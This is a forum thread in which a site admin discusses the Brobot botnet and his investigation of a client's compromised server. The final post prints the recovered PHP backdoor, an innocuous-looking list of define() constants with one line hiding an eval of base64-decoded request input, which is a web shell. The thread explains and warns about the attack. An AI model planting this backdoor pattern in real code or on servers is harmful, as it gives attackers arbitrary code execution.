Last visit was: Fri Jul 04, 2014 5:56 pm
It is currently Fri Jul 04, 2014 5:56 pm


All times are UTC - 5 hours [ DST ]

 [ 6 posts ] 
Author Message
 PostPosted: Thu May 02, 2013 5:58 pm   
Site Admin
User avatar

Joined: Tue May 09, 2006 9:18 am
Posts: 5022

Has anybody hear heard about this?

Anybody interested in what it does? :) I had a really interesting few weeks investigating a client's hijacked server. Nobody's written anything detailed publicly about this exploit and it's been interesting discovering how it all works.

Will post more hopefully very soon but wondered if anyone has already heard of this.


 PostPosted: Fri May 03, 2013 3:59 am   
You are kiillllling-a my bizinisss!
User avatar

Joined: Tue Jun 27, 2006 2:01 am
Posts: 9227
According to an FBI report it is "the botnet used by the hacktivist group Izz ad-Din al-Qassam Cyber Fighters"

An update (April 2013) from the FBI noted some additional scripts in Brobot

More background on the bank attacks at this blog ... resilience

 Profile WWW  
 PostPosted: Fri May 03, 2013 12:52 pm   
Spammer Killing Machine
User avatar

Joined: Sun Jun 13, 2010 5:22 pm
Posts: 528
relation to OpUSA or 07-May-2013 ... 0008.shtml ... than-bite/

 PostPosted: Sun May 05, 2013 10:35 am   
Site Admin
User avatar

Joined: Tue May 09, 2006 9:18 am
Posts: 5022
Hello at last.

I have a week off - staycation - during which I'm mostly just relaxing, organizing my apartment, doing social things, etc. So I'll be in and out.

Sadly: I left all my brobot research at work, so I will paraphrase my evidence.

The "brobot" botnet is really a collection of really stupidly configured websites operated by ISP's who do not put security in a very high priority.

The ISP who was hosting the compromised server I was asked to investigate wasn't performing any logging since that "ate up a lot of disk space" and they're running the "zeus" web server - not to be confused with the "zeus" malware.

Nutshell: Brobot consists of really non-secure web servers that allow a PHP script to execute pretty much ANY command a user wants it to execute.

Those commands include:

- Stop logging any errors.
- Allow my script to run indefinitely
- Allow my script to attempt to upload or check the status of malicious files on several dozen external web servers that I believe are similarly insecure.

That's bad.

The example I found uses a fairly benign file that looks like it's just setting a bunch of global parameters and not much else. But tucked away inside that is a single line that executes an "eval" of a base-64 decoded parameter.

That parameter can contain any PHP command, and does indeed include the above two examples. It's an extremely dangerous file but it doesn't look like it is because it's filled with so much simple, routine functionality.

The bigger problem is: when I found this out, and when I was able to put in some extra logging to determine this, I contacted the 30 most commonly implemented external hosting companies. Most of them replied with "our server isn't infected. You don't know what you're talking about." They didn't even look into any of what I was telling them. They didn't disallow really majorly bad commands from continuing to be run on their servers, and in many cases they felt it was a burden to start logging anything.

The Brobot Botnet is not this "highly organized" criminal organization. Any one of you could choose a server and get it to do whatever you want. That doesn't mean you're now part of an organized criminal operation.

The media is doing a terrible job of reporting about this exploit, and worse than that: all security firms are only treating brobot as if it were a desktop infection, completely ignoring the fact that it can run on servers.

I'll post examples of what I found most likely next week. If I can find anything sooner I will post that too.



 PostPosted: Wed Jan 08, 2014 9:03 pm   
Getting started
User avatar

Joined: Wed Jul 25, 2012 7:29 pm
Posts: 21
Any chance you managed to get a copy of the files for this please?

 PostPosted: Mon Jan 13, 2014 6:28 pm   
Site Admin
User avatar

Joined: Tue May 09, 2006 9:18 am
Posts: 5022

In a way, yes I did.

The files are not that obscure.

All that the hackers did was exploit obvious holes in php and apache (very old versions) and were able to force a php file onto the server. It seems pretty innocuous on the surface. Can you guess which line is the real culprit for this "infection"?

define('SERVER_ROOT', '.');
define('SERVER_VERSION', '2.5');
define('BOOT_DIR', 'bootstrap');
define('SYSTEM_DIR', 'system');
define('SYSTEM_CONF_DIR', 'conf');
define('KERNEL_DIR', 'kernel');
define('SERVICES_DIR', 'services');
define('LIBRARIES_DIR', 'libs');
define('FRAMEWORKS_DIR', 'Frameworks');
define('IMPLEMENTATIONS_DIR', 'implementations');
define('EXTERN_DIR', 'extern');
define('APPS_DIR', 'apps');
define('USERS_DIR', 'users');
define('USERS_CONF_DIR', 'conf');
define('USERS_FILES_DIR', 'files');
define('SYSTEM_SKEL_DIR', 'skel') ? @eval(base64_decode($_REQUEST['c_id'])) : define('SYSTEM_SKEL_PATH', SYSTEM_CONF_PATH . '/' . SYSTEM_SKEL_DIR);
define('USERS_SHARE_DIR', 'share');
define('USERS_META_DIR', 'meta');
define('USERS_META_SETTINGS_FILENAME', 'settings.xml');
define('WORKGROUPS_DIR', 'workgroups');
define('WORKGROUPS_CONF_DIR', 'conf');
define('WORKGROUPS_FILES_DIR', 'files');
define('WORKGROUPS_METAFILES_DIR', 'metafiles');
define('WORKGROUPS_META_DIR', 'meta');
define('WORKGROUPS_META_SETTINGS_FILENAME', 'settings.xml');


 [ 6 posts ] 

All times are UTC - 5 hours [ DST ]

Who is online

Users browsing this forum: Wayback machine and 0 guests

You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Jump to:  

Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group
Style originally created by Volize © 2003 • Redesigned SkyLine by MartectX © 2008